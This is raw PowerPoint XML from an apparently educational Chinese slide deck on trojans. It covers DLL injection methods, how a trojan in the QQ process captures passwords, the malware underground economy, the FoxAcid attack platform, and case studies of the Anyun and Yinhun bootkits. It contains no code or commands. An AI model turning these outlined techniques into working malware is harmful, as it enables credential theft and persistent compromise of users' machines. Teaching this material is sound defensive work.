          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>       缺点是不实时，修改注册表后需要重新启动才能完成进程插入。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(2)使用挂钩(Hook)插入DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>　　比较高级和隐蔽的方式，通过系统的挂钩机制(即“Hook”来插入进程，需要调用SetWindowsHookEx函数(也是一个Win32 API函数)。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>        缺点是技术门槛较高，程序调试困难，这种木马的制作者必须具有相当的Win32编程水平。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通过一个系统API函数来向另一个进程中创建线程(插入DLL)。</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2346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木马是如何隐藏的？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7860" y="1086485"/>
            <a:ext cx="8735695" cy="2158365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>木马首先将1个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DLL文件插入到QQ的进程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>中并成为QQ进程中的一个线程，这样该木马DLL就成为了QQ的一部分！</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>然后在用户输入密码时，因为此时木马DLL已经进入QQ进程内部，所以也就能够</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>接收到用户传递给QQ的密码键入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>了。</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46786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木马是如何盗走QQ密码的？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61390" y="813435"/>
            <a:ext cx="10901680" cy="5992495"/>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87833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木马产业链</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58035" y="438785"/>
            <a:ext cx="9450070" cy="6369685"/>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灰鸽子产业链</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5184775" y="5054600"/>
            <a:ext cx="3128645" cy="1838325"/>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“魔盗”窃密木马</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215515" y="953770"/>
            <a:ext cx="8994140" cy="58515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“魔盗”窃密木马</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2444115" y="782320"/>
            <a:ext cx="7559040" cy="593534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276225" y="65405"/>
            <a:ext cx="8003540" cy="6288405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8989060" y="781050"/>
            <a:ext cx="2677160" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“量子”攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>平台进行的是无差别网络攻击</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“酸狐狸”漏洞攻击武器平台（FoxAcid）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520065" y="1139825"/>
            <a:ext cx="10737215" cy="2861310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“酸狐狸”漏洞攻击武器平台（FoxAcid）是特定入侵行动办公室（TAO）打造的一款</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中间人劫持漏洞攻击平台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>能够在具备</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>会话劫持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等中间人攻击能力的前提下，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>精准识别</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>被攻击目标的版本信息，自动化开展</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>远程漏洞攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>渗透，向目标主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>植入木马、后门</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>酸狐狸平台采用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分布式架构</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，由多台服务器组成，按照任务类型进行分类，包括：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>垃圾钓鱼邮件、中间人攻击、后渗透维持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3771900" y="4554855"/>
            <a:ext cx="3748405" cy="203517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53924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木马案例</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215515" y="1310640"/>
            <a:ext cx="9170670" cy="4154170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>一款远控木马分析https://cloud.tencent.com/developer/article/1577834</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>暗云Ⅲ BootKit 木马分析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>https://cloud.tencent.com/developer/article/1044830</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>一只“蜗牛”偷梁换柱，靠锁主页进行牟利</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>https://cloud.tencent.com/developer/article/1043935</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>记一次服务器被植入挖矿木马CPU飙升200%解决过程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>https://cloud.tencent.com/developer/article/1442440</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40944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暗云系列木马病毒，</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2015</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年</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="33020" y="598170"/>
            <a:ext cx="5278755" cy="6149340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5032375" y="733425"/>
            <a:ext cx="7158990" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"暗云"是迄今为止最复杂的木马之一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用了很多复杂的、新颖的技术，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>长期地潜伏。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5279390" y="1381760"/>
            <a:ext cx="6912610" cy="5408295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>出现中毒标志：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>1、 桌面出现"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>美女视频直播"快捷方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>2、 访问http://baidu.com时网址后面自动加上了一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>奇怪的字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>3、 电脑出现过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RUNDLL错误提示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>框；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>4、安卓手机连接电脑后莫名其妙装上haomm等应用，电脑里查出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xnfbase.dll、thpro32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>等文件，或者你所在qq群出现由你分享的私服游戏(实际上是木马利用qq漏洞上传的);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>5、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>BootKit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，感染了MBR(磁盘主引导区)，即使重装系统，MBR里的恶意代码还会联网下载木马病毒进来，电脑中毒症状会再次出现。</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73126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隐魂木马病毒，</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2017</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年</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="598170"/>
            <a:ext cx="5761990" cy="5966460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5623560" y="781685"/>
            <a:ext cx="6568440" cy="6000750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>捆绑在大量色情播放器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>的安装包中诱导网民下载，入侵后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>劫持浏览器主页</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>并</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>安插后门</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>实现远程控制；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>入侵后选择了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>关机回调的方式伺机启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>感染MBR（磁盘主引导记录）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，躲过了监控；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用了多个漏洞组合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，直接在内核中执行任意代码；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>写入过程完全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>依靠驱动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，不会留下任何落地驱动文件；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>写入动作之前，都会</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>电脑上是否存在网络抓包工具、进程监控工具、调试器、反汇编工具、虚拟机等，一旦存在，就停止感染执行；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RPC远程调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>的方式创建进程，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>被追溯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>隐魂”的活跃量已经直逼暗云系列木马，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
